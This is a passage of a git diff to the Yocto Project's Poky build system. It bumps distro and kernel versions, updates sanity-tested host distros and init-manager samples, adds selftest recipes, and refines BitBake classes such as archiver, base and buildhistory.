+   * **Learn About Kernel Development**: If you want to see how to work with the
+     kernel and understand Yocto Linux kernels, see the :doc:`../kernel-dev/kernel-dev`.
+     This manual provides information on how to patch the kernel, modify kernel
+     recipes, and configure the kernel.
+
+   * **Learn About Board Support Packages (BSPs)**: If you want to learn about
+     BSPs, see the :doc:`../bsp-guide/bsp-guide`. This manual also provides an
+     example BSP creation workflow. See the :doc:`../bsp-guide/bsp` section.
+
+   * **Learn About Toaster**: Toaster is a web interface to the Yocto Project's
+     OpenEmbedded build system. If you are interested in using this type of
+     interface to create images, see the :doc:`../toaster-manual/toaster-manual`.
+
+   * **Have Available the Yocto Project Reference Manual**: Unlike the rest of
+     the Yocto Project manual set, this manual is comprised of material suited
+     for reference rather than procedures. You can get build details, a closer
+     look at how the pieces of the Yocto Project development environment work
+     together, information on various technical details, guidance on migrating
+     to a newer Yocto Project release, reference material on the directory
+     structure, classes, and tasks. The :doc:`../ref-manual/ref-manual` also
+     contains a fairly comprehensive glossary of variables used within the Yocto
+     Project.
+
+.. include:: /boilerplate.rst
diff --git a/meta-poky/conf/distro/poky-tiny.conf b/meta-poky/conf/distro/poky-tiny.conf
index c6d4b88f83..f20cd4ced2 100644
--- a/meta-poky/conf/distro/poky-tiny.conf
+++ b/meta-poky/conf/distro/poky-tiny.conf
@@ -38,7 +38,7 @@ TCLIBC = "musl"
 # Distro config is evaluated after the machine config, so we have to explicitly
 # set the kernel provider to override a machine config.
 PREFERRED_PROVIDER_virtual/kernel = "linux-yocto-tiny"
-PREFERRED_VERSION_linux-yocto-tiny ?= "5.0%"
+PREFERRED_VERSION_linux-yocto-tiny ?= "5.4%"
 
 # We can use packagegroup-core-boot, but in the future we may need a new packagegroup-core-tiny
 #POKY_DEFAULT_EXTRA_RDEPENDS += "packagegroup-core-boot"
diff --git a/meta-poky/conf/distro/poky.conf b/meta-poky/conf/distro/poky.conf
index 1c3c28438b..25b0c8e608 100644
--- a/meta-poky/conf/distro/poky.conf
+++ b/meta-poky/conf/distro/poky.conf
@@ -1,6 +1,6 @@
 DISTRO = "poky"
 DISTRO_NAME = "Poky (Yocto Project Reference Distro)"
-DISTRO_VERSION = "3.1.4"
+DISTRO_VERSION = "3.1.33"
 DISTRO_CODENAME = "dunfell"
 SDK_VENDOR = "-pokysdk"
 SDK_VERSION = "${@d.getVar('DISTRO_VERSION').replace('snapshot-${DATE}', 'snapshot')}"
@@ -24,7 +24,7 @@ DISTRO_FEATURES ?= "${DISTRO_FEATURES_DEFAULT} ${POKY_DEFAULT_DISTRO_FEATURES}"
 PREFERRED_VERSION_linux-yocto ?= "5.4%"
 
 SDK_NAME = "${DISTRO}-${TCLIBC}-${SDKMACHINE}-${IMAGE_BASENAME}-${TUNE_PKGARCH}-${MACHINE}"
-SDKPATH = "/opt/${DISTRO}/${SDK_VERSION}"
+SDKPATHINSTALL = "/opt/${DISTRO}/${SDK_VERSION}"
 
 DISTRO_EXTRA_RDEPENDS += " ${POKY_DEFAULT_EXTRA_RDEPENDS}"
 DISTRO_EXTRA_RRECOMMENDS += " ${POKY_DEFAULT_EXTRA_RRECOMMENDS}"
@@ -39,42 +39,18 @@ DISTRO_EXTRA_RDEPENDS_append_qemux86-64 = " ${POKYQEMUDEPS}"
 
 TCLIBCAPPEND = ""
 
-PREMIRRORS ??= "\
-bzr://.*/.*   http://downloads.yoctoproject.org/mirror/sources/ \n \
-cvs://.*/.*   http://downloads.yoctoproject.org/mirror/sources/ \n \
-git://.*/.*   http://downloads.yoctoproject.org/mirror/sources/ \n \
-gitsm://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
-hg://.*/.*    http://downloads.yoctoproject.org/mirror/sources/ \n \
-osc://.*/.*   http://downloads.yoctoproject.org/mirror/sources/ \n \
-p4://.*/.*    http://downloads.yoctoproject.org/mirror/sources/ \n \
-svn://.*/.*   http://downloads.yoctoproject.org/mirror/sources/ \n"
-
 SANITY_TESTED_DISTROS ?= " \
             poky-2.7 \n \
             poky-3.0 \n \
             poky-3.1 \n \
-            ubuntu-16.04 \n \
             ubuntu-18.04 \n \
-            ubuntu-19.04 \n \
             ubuntu-20.04 \n \
-            fedora-30 \n \
-            fedora-31 \n \
-            fedora-32 \n \
-            centos-7 \n \
-            centos-8 \n \
-            debian-8 \n \
-            debian-9 \n \
-            debian-10 \n \
-            opensuseleap-15.1 \n \
+            ubuntu-22.04 \n \
+            fedora-37 \n \
+            debian-11 \n \
+            opensuseleap-15.3 \n \
+            almalinux-8.8 \n \
             "
-#
-# OELAYOUT_ABI allows us to notify users when the format of TMPDIR changes in
-# an incompatible way. Such changes should usually be detailed in the commit
-# that breaks the format and have been previously discussed on the mailing list
-# with general agreement from the core team.
-#
-OELAYOUT_ABI = "12"
-
 # add poky sanity bbclass
 INHERIT += "poky-sanity"
 
diff --git a/meta-poky/conf/local.conf.sample b/meta-poky/conf/local.conf.sample
index b555f1d21e..ea37a801aa 100644
--- a/meta-poky/conf/local.conf.sample
+++ b/meta-poky/conf/local.conf.sample
@@ -231,7 +231,7 @@ BB_DISKMON_DIRS ??= "\
 # present in the cache. It assumes you can download something faster than you can build it
 # which will depend on your network.
 #
-#SSTATE_MIRRORS ?= "file://.* http://sstate.yoctoproject.org/2.5/PATH;downloadfilename=PATH"
+#SSTATE_MIRRORS ?= "file://.* http://sstate.yoctoproject.org/all/PATH;downloadfilename=PATH"
 
 #
 # Qemu configuration
diff --git a/meta-poky/conf/local.conf.sample.extended b/meta-poky/conf/local.conf.sample.extended
index dc92a16f6c..9e857360ae 100644
--- a/meta-poky/conf/local.conf.sample.extended
+++ b/meta-poky/conf/local.conf.sample.extended
@@ -328,7 +328,7 @@ DISTRO_FEATURES_remove = "x11"
 # The INITRAMFS_IMAGE image variable will cause an additional recipe to
 # be built as a dependency to the what ever rootfs recipe you might be
 # using such as core-image-sato.  The initramfs might be needed for
-# the initial boot of of the target system such as to load kernel
+# the initial boot of the target system such as to load kernel
 # modules prior to mounting the root file system.
 #
 # INITRAMFS_IMAGE_BUNDLE variable controls if the image recipe
@@ -368,20 +368,9 @@ DISTRO_FEATURES_remove = "x11"
 #
 
 #
-# Use busybox/mdev for system initialization
+# System initialization
 #
-#VIRTUAL-RUNTIME_dev_manager = "busybox-mdev"
-#VIRTUAL-RUNTIME_login_manager = "busybox"
-#VIRTUAL-RUNTIME_init_manager = "busybox"
-#VIRTUAL-RUNTIME_initscripts = "initscripts"
-#VIRTUAL-RUNTIME_keymaps = "keymaps"
-#DISTRO_FEATURES_BACKFILL_CONSIDERED += "sysvinit"
-
-#
-# Use systemd for system initialization
-#
-#DISTRO_FEATURES_append = " systemd"
-#DISTRO_FEATURES_BACKFILL_CONSIDERED += "sysvinit"
-#VIRTUAL-RUNTIME_login_manager = "shadow-base"
-#VIRTUAL-RUNTIME_init_manager = "systemd"
-#VIRTUAL-RUNTIME_initscripts = "systemd-compat-units"
+#INIT_MANAGER = "none"
+#INIT_MANAGER = "sysvinit"
+#INIT_MANAGER = "systemd"
+#INIT_MANAGER = "mdev-busybox"
diff --git a/meta-selftest/lib/pseudo_pyc_test1.py b/meta-selftest/lib/pseudo_pyc_test1.py
new file mode 100644
index 0000000000..b59abdd536
--- /dev/null
+++ b/meta-selftest/lib/pseudo_pyc_test1.py
@@ -0,0 +1 @@
+STRING = "pseudo_pyc_test1"
diff --git a/meta-selftest/lib/pseudo_pyc_test2.py b/meta-selftest/lib/pseudo_pyc_test2.py
new file mode 100644
index 0000000000..fb67a978e0
--- /dev/null
+++ b/meta-selftest/lib/pseudo_pyc_test2.py
@@ -0,0 +1 @@
+STRING = "pseudo_pyc_test2"
diff --git a/meta-selftest/recipes-test/aspell/aspell_0.0.0.1.bb b/meta-selftest/recipes-test/aspell/aspell_0.0.0.1.bb
index 9f905a5198..dcf6c8ba63 100644
--- a/meta-selftest/recipes-test/aspell/aspell_0.0.0.1.bb
+++ b/meta-selftest/recipes-test/aspell/aspell_0.0.0.1.bb
@@ -4,6 +4,7 @@
 
 SUMMARY = "GNU Aspell spell-checker"
 SECTION = "console/utils"
+HOMEPAGE = "https://ftp.gnu.org/gnu/aspell/"
 
 LICENSE = "LGPLv2 | LGPLv2.1"
 LIC_FILES_CHKSUM = "file://COPYING;md5=7fbc338309ac38fefcd64b04bb903e34"
diff --git a/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb b/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb
index 07b83276fb..8a27e3a791 100644
--- a/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb
+++ b/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb
@@ -11,7 +11,7 @@ SRCREV = "1a3e1343761b30750bed70e0fd688f6d3c7b3717"
 PV = "0.1+git${SRCPV}"
 PR = "r2"
 
-SRC_URI = "git://git.yoctoproject.org/dbus-wait"
+SRC_URI = "git://git.yoctoproject.org/dbus-wait;branch=master"
 UPSTREAM_CHECK_COMMITS = "1"
 RECIPE_NO_UPDATE_REASON = "This recipe is used to test devtool upgrade feature"
 
diff --git a/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded b/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded
index 32ec4b14fa..fbe90d6c6b 100644
--- a/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded
+++ b/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded
@@ -10,7 +10,7 @@ DEPENDS = "dbus"
 SRCREV = "6cc6077a36fe2648a5f993fe7c16c9632f946517"
 PV = "0.1+git${SRCPV}"
 
-SRC_URI = "git://git.yoctoproject.org/dbus-wait"
+SRC_URI = "git://git.yoctoproject.org/dbus-wait;branch=master"
 UPSTREAM_CHECK_COMMITS = "1"
 RECIPE_NO_UPDATE_REASON = "This recipe is used to test devtool upgrade feature"
 
diff --git a/meta-selftest/recipes-test/images/oe-selftest-image.bb b/meta-selftest/recipes-test/images/oe-selftest-image.bb
index 5d4d10eef6..6246aae910 100644
--- a/meta-selftest/recipes-test/images/oe-selftest-image.bb
+++ b/meta-selftest/recipes-test/images/oe-selftest-image.bb
@@ -1,6 +1,6 @@
 SUMMARY = "An image used during oe-selftest tests"
 
-IMAGE_INSTALL = "packagegroup-core-boot dropbear"
+IMAGE_INSTALL = "packagegroup-core-boot packagegroup-core-ssh-dropbear"
 IMAGE_FEATURES = "debug-tweaks"
 
 IMAGE_LINGUAS = " "
diff --git a/meta-selftest/recipes-test/images/wic-image-minimal.bb b/meta-selftest/recipes-test/images/wic-image-minimal.bb
index e1da203b59..1cb019898d 100644
--- a/meta-selftest/recipes-test/images/wic-image-minimal.bb
+++ b/meta-selftest/recipes-test/images/wic-image-minimal.bb
@@ -6,7 +6,10 @@ IMAGE_INSTALL = "packagegroup-core-boot"
 
 IMAGE_FSTYPES = "wic"
 
-WKS_FILE_DEPENDS = "syslinux syslinux-native dosfstools-native mtools-native gptfdisk-native"
+WKS_FILE_DEPENDS = "dosfstools-native mtools-native gptfdisk-native"
+WKS_FILE_DEPENDS_append_x86 = " syslinux-native syslinux"
+WKS_FILE_DEPENDS_append_x86-64 = " syslinux-native syslinux"
+WKS_FILE_DEPENDS_append_x86-x32 = " syslinux-native syslinux"
 
 LIC_FILES_CHKSUM = "file://${COREBASE}/meta/COPYING.MIT;md5=3da9cfbcb788c80a0384361b4de20420"
 
diff --git a/meta-selftest/recipes-test/pseudo-pyc-test/pseudo-pyc-test.bb b/meta-selftest/recipes-test/pseudo-pyc-test/pseudo-pyc-test.bb
new file mode 100644
index 0000000000..12dc91a8f3
--- /dev/null
+++ b/meta-selftest/recipes-test/pseudo-pyc-test/pseudo-pyc-test.bb
@@ -0,0 +1,15 @@
+SUMMARY = "pseudo env test"
+LICENSE = "MIT"
+LIC_FILES_CHKSUM = "file://${COREBASE}/meta/COPYING.MIT;md5=3da9cfbcb788c80a0384361b4de20420"
+
+INHIBIT_DEFAULT_DEPS = "1"
+
+python do_compile() {
+    import pseudo_pyc_test1
+    print(pseudo_pyc_test1.STRING)
+}
+
+python do_install() {
+    import pseudo_pyc_test2
+    print(pseudo_pyc_test2.STRING)
+}
diff --git a/meta-selftest/recipes-test/recipeutils/recipeutils-test_1.2.bb b/meta-selftest/recipes-test/recipeutils/recipeutils-test_1.2.bb
index 0cd0494da8..fd113b5ec5 100644
--- a/meta-selftest/recipes-test/recipeutils/recipeutils-test_1.2.bb
+++ b/meta-selftest/recipes-test/recipeutils/recipeutils-test_1.2.bb
@@ -2,7 +2,7 @@ SUMMARY = "Test recipe for recipeutils.patch_recipe()"
 
 require recipeutils-test.inc
 
-LICENSE = "Proprietary"
+LICENSE = "HPND"
 LIC_FILES_CHKSUM = "file://${WORKDIR}/somefile;md5=d41d8cd98f00b204e9800998ecf8427e"
 DEPENDS += "zlib"
 
diff --git a/meta-skeleton/recipes-baremetal/baremetal-examples/baremetal-helloworld_git.bb b/meta-skeleton/recipes-baremetal/baremetal-examples/baremetal-helloworld_git.bb
index d8633702fc..8db57f202e 100644
--- a/meta-skeleton/recipes-baremetal/baremetal-examples/baremetal-helloworld_git.bb
+++ b/meta-skeleton/recipes-baremetal/baremetal-examples/baremetal-helloworld_git.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Baremetal examples to work with the several QEMU architectures supported on OpenEmbedded"
 HOMEPAGE = "https://github.com/aehs29/baremetal-helloqemu"
+DESCRIPTION = "These are introductory examples to showcase the use of QEMU to run baremetal applications."
 LICENSE = "MIT"
 LIC_FILES_CHKSUM = "file://LICENSE;md5=39346640a23c701e4f459e05f56f4449"
 
diff --git a/meta-skeleton/recipes-kernel/hello-mod/hello-mod_0.1.bb b/meta-skeleton/recipes-kernel/hello-mod/hello-mod_0.1.bb
index 3d33446500..bc9acccd5f 100644
--- a/meta-skeleton/recipes-kernel/hello-mod/hello-mod_0.1.bb
+++ b/meta-skeleton/recipes-kernel/hello-mod/hello-mod_0.1.bb
@@ -1,4 +1,5 @@
 SUMMARY = "Example of how to build an external Linux kernel module"
+DESCRIPTION = "${SUMMARY}"
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e"
 
diff --git a/meta-skeleton/recipes-kernel/linux/linux-yocto-custom.bb b/meta-skeleton/recipes-kernel/linux/linux-yocto-custom.bb
index 6194d4f8da..d53f9c7a40 100644
--- a/meta-skeleton/recipes-kernel/linux/linux-yocto-custom.bb
+++ b/meta-skeleton/recipes-kernel/linux/linux-yocto-custom.bb
@@ -1,6 +1,6 @@
+SUMMARY = "An example kernel recipe that uses the linux-yocto and oe-core"
 # linux-yocto-custom.bb:
 #
-#   An example kernel recipe that uses the linux-yocto and oe-core
 #   kernel classes to apply a subset of yocto kernel management to git
 #   managed kernel repositories.
 #
diff --git a/meta-skeleton/recipes-multilib/images/core-image-multilib-example.bb b/meta-skeleton/recipes-multilib/images/core-image-multilib-example.bb
index f13186f933..e7d50aefda 100644
--- a/meta-skeleton/recipes-multilib/images/core-image-multilib-example.bb
+++ b/meta-skeleton/recipes-multilib/images/core-image-multilib-example.bb
@@ -1,5 +1,4 @@
-#
-# An example of a multilib image
+SUMMARY = "An example of a multilib image"
 #
 # This example includes a lib32 version of bash into an otherwise standard
 # sato image. It assumes a "lib32" multilib has been enabled in the user's
diff --git a/meta-skeleton/recipes-skeleton/service/service_0.1.bb b/meta-skeleton/recipes-skeleton/service/service_0.1.bb
index 6416618dcb..669d173ad1 100644
--- a/meta-skeleton/recipes-skeleton/service/service_0.1.bb
+++ b/meta-skeleton/recipes-skeleton/service/service_0.1.bb
@@ -1,5 +1,6 @@
 SUMMARY = "The canonical example of init scripts"
 SECTION = "base"
+DESCRIPTION = "This recipe is a canonical example of init scripts"
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://${WORKDIR}/COPYRIGHT;md5=349c872e0066155e1818b786938876a4"
 
diff --git a/meta-yocto-bsp/recipes-kernel/linux/linux-yocto_5.4.bbappend b/meta-yocto-bsp/recipes-kernel/linux/linux-yocto_5.4.bbappend
index 9c37f91bc1..fbe039aa95 100644
--- a/meta-yocto-bsp/recipes-kernel/linux/linux-yocto_5.4.bbappend
+++ b/meta-yocto-bsp/recipes-kernel/linux/linux-yocto_5.4.bbappend
@@ -7,8 +7,8 @@ KMACHINE_genericx86 ?= "common-pc"
 KMACHINE_genericx86-64 ?= "common-pc-64"
 KMACHINE_beaglebone-yocto ?= "beaglebone"
 
-SRCREV_machine_genericx86 ?= "706efec4c1e270ec5dda92275898cd465dfdc7dd"
-SRCREV_machine_genericx86-64 ?= "706efec4c1e270ec5dda92275898cd465dfdc7dd"
+SRCREV_machine_genericx86 ?= "35826e154ee014b64ccfa0d1f12d36b8f8a75939"
+SRCREV_machine_genericx86-64 ?= "35826e154ee014b64ccfa0d1f12d36b8f8a75939"
 SRCREV_machine_edgerouter ?= "706efec4c1e270ec5dda92275898cd465dfdc7dd"
 SRCREV_machine_beaglebone-yocto ?= "706efec4c1e270ec5dda92275898cd465dfdc7dd"
 
@@ -17,7 +17,7 @@ COMPATIBLE_MACHINE_genericx86-64 = "genericx86-64"
 COMPATIBLE_MACHINE_edgerouter = "edgerouter"
 COMPATIBLE_MACHINE_beaglebone-yocto = "beaglebone-yocto"
 
-LINUX_VERSION_genericx86 = "5.4.58"
-LINUX_VERSION_genericx86-64 = "5.4.58"
+LINUX_VERSION_genericx86 = "5.4.219"
+LINUX_VERSION_genericx86-64 = "5.4.219"
 LINUX_VERSION_edgerouter = "5.4.58"
 LINUX_VERSION_beaglebone-yocto = "5.4.58"
diff --git a/meta/classes/archiver.bbclass b/meta/classes/archiver.bbclass
index 1a3c190604..6ead010fe1 100644
--- a/meta/classes/archiver.bbclass
+++ b/meta/classes/archiver.bbclass
@@ -53,10 +53,11 @@ ARCHIVER_MODE[recipe] ?= "0"
 ARCHIVER_MODE[mirror] ?= "split"
 
 DEPLOY_DIR_SRC ?= "${DEPLOY_DIR}/sources"
-ARCHIVER_TOPDIR ?= "${WORKDIR}/deploy-sources"
-ARCHIVER_OUTDIR = "${ARCHIVER_TOPDIR}/${TARGET_SYS}/${PF}/"
+ARCHIVER_TOPDIR ?= "${WORKDIR}/archiver-sources"
+ARCHIVER_ARCH = "${TARGET_SYS}"
+ARCHIVER_OUTDIR = "${ARCHIVER_TOPDIR}/${ARCHIVER_ARCH}/${PF}/"
 ARCHIVER_RPMTOPDIR ?= "${WORKDIR}/deploy-sources-rpm"
-ARCHIVER_RPMOUTDIR = "${ARCHIVER_RPMTOPDIR}/${TARGET_SYS}/${PF}/"
+ARCHIVER_RPMOUTDIR = "${ARCHIVER_RPMTOPDIR}/${ARCHIVER_ARCH}/${PF}/"
 ARCHIVER_WORKDIR = "${WORKDIR}/archiver-work/"
 
 # When producing a combined mirror directory, allow duplicates for the case
@@ -100,6 +101,10 @@ python () {
         bb.debug(1, 'archiver: %s is excluded, covered by gcc-source' % pn)
         return
 
+    # TARGET_SYS in ARCHIVER_ARCH will break the stamp for gcc-source in multiconfig
+    if pn.startswith('gcc-source'):
+        d.setVar('ARCHIVER_ARCH', "allarch")
+
     def hasTask(task):
         return bool(d.getVarFlag(task, "task", False)) and not bool(d.getVarFlag(task, "noexec", False))
 
@@ -281,7 +286,10 @@ python do_ar_configured() {
         # ${STAGING_DATADIR}/aclocal/libtool.m4, so we can't re-run the
         # do_configure, we archive the already configured ${S} to
         # instead of.
-        elif pn != 'libtool-native':
+        # The kernel class functions require it to be on work-shared, we
+        # don't unpack, patch, configure again, just archive the already
+        # configured ${S}
+        elif not (pn == 'libtool-native' or is_work_shared(d)):
             def runTask(task):
                 prefuncs = d.getVarFlag(task, 'prefuncs') or ''
                 for func in prefuncs.split():
@@ -484,6 +492,9 @@ python do_unpack_and_patch() {
         src_orig = '%s.orig' % src
         oe.path.copytree(src, src_orig)
 
+    if bb.data.inherits_class('dos2unix', d):
+        bb.build.exec_func('do_convert_crlf_to_lf', d)
+
     # Make sure gcc and kernel sources are patched only once
     if not (d.getVar('SRC_URI') == "" or is_work_shared(d)):
         bb.build.exec_func('do_patch', d)
@@ -572,7 +583,7 @@ python do_dumpdata () {
 
 SSTATETASKS += "do_deploy_archives"
 do_deploy_archives () {
-    echo "Deploying source archive files from ${ARCHIVER_TOPDIR} to ${DEPLOY_DIR_SRC}."
+    bbnote "Deploying source archive files from ${ARCHIVER_TOPDIR} to ${DEPLOY_DIR_SRC}."
 }
 python do_deploy_archives_setscene () {
     sstate_setscene(d)
@@ -591,6 +602,7 @@ addtask do_dumpdata
 addtask do_ar_recipe
 addtask do_deploy_archives
 do_build[recrdeptask] += "do_deploy_archives"
+do_rootfs[recrdeptask] += "do_deploy_archives"
 do_populate_sdk[recrdeptask] += "do_deploy_archives"
 
 python () {
diff --git a/meta/classes/base.bbclass b/meta/classes/base.bbclass
index 7aa2e144eb..3cae577a0e 100644
--- a/meta/classes/base.bbclass
+++ b/meta/classes/base.bbclass
@@ -122,6 +122,10 @@ def setup_hosttools_dir(dest, toolsvar, d, fatal=True):
     tools = d.getVar(toolsvar).split()
     origbbenv = d.getVar("BB_ORIGENV", False)
     path = origbbenv.getVar("PATH")
+    # Need to ignore our own scripts directories to avoid circular links
+    for p in path.split(":"):
+        if p.endswith("/scripts"):
+            path = path.replace(p, "/ignoreme")
     bb.utils.mkdirhier(dest)
     notfound = []
     for tool in tools:
@@ -135,7 +139,7 @@ def setup_hosttools_dir(dest, toolsvar, d, fatal=True):
             # /usr/local/bin/ccache/gcc -> /usr/bin/ccache, then which(gcc)
             # would return /usr/local/bin/ccache/gcc, but what we need is
             # /usr/bin/gcc, this code can check and fix that.
-            if "ccache" in srctool:
+            if os.path.islink(srctool) and os.path.basename(os.readlink(srctool)) == 'ccache':
                 srctool = bb.utils.which(path, tool, executable=True, direction=1)
             if srctool:
                 os.symlink(srctool, desttool)
@@ -153,14 +157,14 @@ do_fetch[vardeps] += "SRCREV"
 python base_do_fetch() {
 
     src_uri = (d.getVar('SRC_URI') or "").split()
-    if len(src_uri) == 0:
+    if not src_uri:
         return
 
     try:
         fetcher = bb.fetch2.Fetch(src_uri, d)
         fetcher.download()
     except bb.fetch2.BBFetchException as e:
-        bb.fatal(str(e))
+        bb.fatal("Bitbake Fetcher Error: " + repr(e))
 }
 
 addtask unpack after do_fetch
@@ -170,14 +174,14 @@ do_unpack[cleandirs] = "${@d.getVar('S') if os.path.normpath(d.getVar('S')) != o
 
 python base_do_unpack() {
     src_uri = (d.getVar('SRC_URI') or "").split()
-    if len(src_uri) == 0:
+    if not src_uri:
         return
 
     try:
         fetcher = bb.fetch2.Fetch(src_uri, d)
         fetcher.unpack(d.getVar('WORKDIR'))
     except bb.fetch2.BBFetchException as e:
-        bb.fatal(str(e))
+        bb.fatal("Bitbake Fetcher Error: " + repr(e))
 }
 
 def get_layers_branch_rev(d):
@@ -231,6 +235,7 @@ python base_eventhandler() {
     if isinstance(e, bb.event.ConfigParsed):
         if not d.getVar("NATIVELSBSTRING", False):
             d.setVar("NATIVELSBSTRING", lsb_distro_identifier(d))
+        d.setVar("ORIGNATIVELSBSTRING", d.getVar("NATIVELSBSTRING", False))
         d.setVar('BB_VERSION', bb.__version__)
 
     # There might be no bb.event.ConfigParsed event if bitbake server is
@@ -388,6 +393,11 @@ python () {
     oe.utils.features_backfill("DISTRO_FEATURES", d)
     oe.utils.features_backfill("MACHINE_FEATURES", d)
 
+    if os.path.normpath(d.getVar("WORKDIR")) != os.path.normpath(d.getVar("S")):
+        d.appendVar("PSEUDO_IGNORE_PATHS", ",${S}")
+    if os.path.normpath(d.getVar("WORKDIR")) != os.path.normpath(d.getVar("B")):
+        d.appendVar("PSEUDO_IGNORE_PATHS", ",${B}")
+
     # Handle PACKAGECONFIG
     #
     # These take the form:
@@ -682,7 +692,7 @@ python () {
             if os.path.basename(p) == machine and os.path.isdir(p):
                 paths.append(p)
 
-        if len(paths) != 0:
+        if paths:
             for s in srcuri.split():
                 if not s.startswith("file://"):
                     continue
@@ -715,7 +725,7 @@ do_cleansstate[nostamp] = "1"
 
 python do_cleanall() {
     src_uri = (d.getVar('SRC_URI') or "").split()
-    if len(src_uri) == 0:
+    if not src_uri:
         return
 
     try:
diff --git a/meta/classes/bin_package.bbclass b/meta/classes/bin_package.bbclass
index cbc9b1fa13..c1954243ee 100644
--- a/meta/classes/bin_package.bbclass
+++ b/meta/classes/bin_package.bbclass
@@ -30,8 +30,9 @@ bin_package_do_install () {
         bbfatal bin_package has nothing to install. Be sure the SRC_URI unpacks into S.
     fi
     cd ${S}
+    install -d ${D}${base_prefix}
     tar --no-same-owner --exclude='./patches' --exclude='./.pc' -cpf - . \
-        | tar --no-same-owner -xpf - -C ${D}
+        | tar --no-same-owner -xpf - -C ${D}${base_prefix}
 }
 
 FILES_${PN} = "/"
diff --git a/meta/classes/buildhistory.bbclass b/meta/classes/buildhistory.bbclass
index 156324d339..6a1a20653a 100644
--- a/meta/classes/buildhistory.bbclass
+++ b/meta/classes/buildhistory.bbclass
@@ -671,13 +671,16 @@ IMAGE_POSTPROCESS_COMMAND[vardepsexclude] += "buildhistory_get_imageinfo"
 POPULATE_SDK_POST_TARGET_COMMAND_append = " buildhistory_list_installed_sdk_target;"
 POPULATE_SDK_POST_TARGET_COMMAND_append = " buildhistory_get_sdk_installed_target;"
 POPULATE_SDK_POST_TARGET_COMMAND[vardepvalueexclude] .= "| buildhistory_list_installed_sdk_target;| buildhistory_get_sdk_installed_target;"
+POPULATE_SDK_POST_TARGET_COMMAND[vardepsexclude] += "buildhistory_list_installed_sdk_target buildhistory_get_sdk_installed_target"
 
 POPULATE_SDK_POST_HOST_COMMAND_append = " buildhistory_list_installed_sdk_host;"
 POPULATE_SDK_POST_HOST_COMMAND_append = " buildhistory_get_sdk_installed_host;"
 POPULATE_SDK_POST_HOST_COMMAND[vardepvalueexclude] .= "| buildhistory_list_installed_sdk_host;| buildhistory_get_sdk_installed_host;"
+POPULATE_SDK_POST_HOST_COMMAND[vardepsexclude] += "buildhistory_list_installed_sdk_host buildhistory_get_sdk_installed_host"
 
 SDK_POSTPROCESS_COMMAND_append = " buildhistory_get_sdkinfo ; buildhistory_get_extra_sdkinfo; "
 SDK_POSTPROCESS_COMMAND[vardepvalueexclude] .= "| buildhistory_get_sdkinfo ; buildhistory_get_extra_sdkinfo; "
+SDK_POSTPROCESS_COMMAND[vardepsexclude] += "buildhistory_get_sdkinfo buildhistory_get_extra_sdkinfo"
 
 python buildhistory_write_sigs() {
     if not "task" in (d.getVar('BUILDHISTORY_FEATURES') or "").split():
@@ -852,7 +855,7 @@ END
 }
 
 python buildhistory_eventhandler() {
-    if e.data.getVar('BUILDHISTORY_FEATURES').strip():
+    if (e.data.getVar('BUILDHISTORY_FEATURES') or "").strip():
         reset = e.data.getVar("BUILDHISTORY_RESET")
         olddir = e.data.getVar("BUILDHISTORY_OLD_DIR")
         if isinstance(e, bb.event.BuildStarted):
@@ -862,6 +865,7 @@ python buildhistory_eventhandler() {
                 if os.path.isdir(olddir):
                     shutil.rmtree(olddir)
                 rootdir = e.data.getVar("BUILDHISTORY_DIR")
+                bb.utils.mkdirhier(rootdir)
                 entries = [ x for x in os.listdir(rootdir) if not x.startswith('.') ]
                 bb.utils.mkdirhier(olddir)
                 for entry in entries:
@@ -950,23 +954,19 @@ def write_latest_srcrev(d, pkghistdir):
                         value = value.replace('"', '').strip()
                         old_tag_srcrevs[key] = value
         with open(srcrevfile, 'w') as f:
-            orig_srcrev = d.getVar('SRCREV', False) or 'INVALID'
-            if orig_srcrev != 'INVALID':
-                f.write('# SRCREV = "%s"\n' % orig_srcrev)
-            if len(srcrevs) > 1:
-                for name, srcrev in sorted(srcrevs.items()):
-                    orig_srcrev = d.getVar('SRCREV_%s' % name, False)
-                    if orig_srcrev:
-                        f.write('# SRCREV_%s = "%s"\n' % (name, orig_srcrev))
-                    f.write('SRCREV_%s = "%s"\n' % (name, srcrev))
-            else:
-                f.write('SRCREV = "%s"\n' % next(iter(srcrevs.values())))
-            if len(tag_srcrevs) > 0:
-                for name, srcrev in sorted(tag_srcrevs.items()):
-                    f.write('# tag_%s = "%s"\n' % (name, srcrev))
-                    if name in old_tag_srcrevs and old_tag_srcrevs[name] != srcrev:
-                        pkg = d.getVar('PN')
-                        bb.warn("Revision for tag %s in package %s was changed since last build (from %s to %s)" % (name, pkg, old_tag_srcrevs[name], srcrev))
+            for name, srcrev in sorted(srcrevs.items()):
+                suffix = "_" + name
+                if name == "default":
+                    suffix = ""
+                orig_srcrev = d.getVar('SRCREV%s' % suffix, False)
+                if orig_srcrev:
+                    f.write('# SRCREV%s = "%s"\n' % (suffix, orig_srcrev))
+                f.write('SRCREV%s = "%s"\n' % (suffix, srcrev))
+            for name, srcrev in sorted(tag_srcrevs.items()):
+                f.write('# tag_%s = "%s"\n' % (name, srcrev))
+                if name in old_tag_srcrevs and old_tag_srcrevs[name] != srcrev:
+                    pkg = d.getVar('PN')
+                    bb.warn("Revision for tag %s in package %s was changed since last build (from %s to %s)" % (name, pkg, old_tag_srcrevs[name], srcrev))
 
     else:
         if os.path.exists(srcrevfile):
diff --git a/meta/classes/cmake.bbclass b/meta/classes/cmake.bbclass
index 8243f7ce8c..af6a8c4395 100644
--- a/meta/classes/cmake.bbclass
+++ b/meta/classes/cmake.bbclass
@@ -102,7 +102,8 @@ set( CMAKE_CXX_COMPILER ${OECMAKE_CXX_COMPILER} )
 set( CMAKE_C_COMPILER_LAUNCHER ${OECMAKE_C_COMPILER_LAUNCHER} )
 set( CMAKE_CXX_COMPILER_LAUNCHER ${OECMAKE_CXX_COMPILER_LAUNCHER} )
